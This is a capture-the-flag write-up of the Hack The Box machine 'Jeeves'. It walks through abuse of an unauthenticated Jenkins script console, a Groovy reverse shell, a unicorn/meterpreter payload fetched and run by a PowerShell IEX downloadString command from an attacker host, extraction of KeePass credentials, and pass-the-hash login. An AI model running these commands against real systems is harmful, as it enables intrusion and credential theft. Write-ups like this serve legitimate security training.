Jeeves

Jeeves - 10.10.10.63

Target Enumeration:

OS: Windows

IP: 10.10.10.63

User Hash: e3232272596fb47950d59c4cf1e7066a

Root Hash: afbc5bd4b615a60648cec41c6ac92530

Ports / Services / Software Versions Running

80/tcp open http syn-ack ttl 127 Microsoft IIS httpd 10.0

135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC

445/tcp open microsoft-ds syn-ack ttl 127 Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)

50000/tcp open http syn-ack ttl 127 Jetty 9.4.z-SNAPSHOT

Service Info: Host: JEEVES; OS: Windows; CPE: cpe:/o:microsoft:windows

Vulnerability Exploited:

Jenkins /script enabled unauthenticated on port 50000

Privilege Escalation

Administrator hash stored in keepass file with weak password.

Replicating the exploit:

Nmap TCP

Nmap UDP:

Nikto:

Port 80

Port 50000

Dirb:

Port 80

Port 50000 brings back nothing.

Dirbuster

Nothing found on port 50000.

/askjeeves on port 50000

Enum4linux brought back nothing

Browsed to port 80 and it is a search bar which always gives you this:

Source code:

Response from initial web page.

Downloaded image and ran image though strings and binwalk which brought back nothing.

This is an image not a verbose error message which suggests it could be a troll.

Downloaded the main image and checked it to see if it had anything in it with strings.

Browsed to port 50000 and you get this:

Potential software version: Jetty:// 9.4.z-SNAPSHOT

https://www.exploit-db.com/exploits/36318/

dotdotpwn -m http -o windows -x 50000 -h 10.10.10.63

Also tried

https://packetstormsecurity.com/files/130567/Jetty-9.2.8-Shared-Buffer-Leakage.html

Not vulnerable

Come back to this.

Finally found some dirs

Dirbuster

Searchsploit brought back:

Metasploit brought back

None of them worked.

Found a way to execute commands via groovy script on webserver:

Found rvshell.groovy

https://gist.github.com/frohoff/fed1ffaab9b9beeb1c76

Download to system with github and modify

Paste into the scriptconsole

Execute with 443 listening.

Use the following code to download files to the system

Convert to a meterpreter shell

git clone https://github.com/trustedsec/unicorn.git
cd unicorn
python unicorn.py windows/meterpreter/reverse_tcp 192.168.0.1 443
python -m SimpleHTTPServer 80

In new tab

mv powershell_attack.txt Shell.ps1
msfconsole -r unicorn.rc

On victim machine from a command prompt.

powershell -nop -exec bypass -c "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.8/Shell.ps1')"

Run local exploit suggester against the host

Drop into a shell and download tools

PowerUp.ps1

Service found

No exploits worked so far so start digging around the system

We found the following credentials in credentials.xml in the jenkins dir.

These are encrypted so run the following via the /script dir on the webserver and you get the password admin:

Search for other passwords

This once cracked gives you admin:admin which is of no use for privesc.

Digging around the file system we find a keepass file called CEH

Download the file locally and decrypt the password

Install kpcli

apt-get install kpcli libterm-readline-gnu-perl libdata-password-perl

Inspect all of the entries

Looks like a ntlm hash

Use passthehash to login to the system

Upload a windows shell via our low priv account and execute via pth-winexe

Interact with the meterpreter shell

Grab your flags:

View the data stream to read the root flag: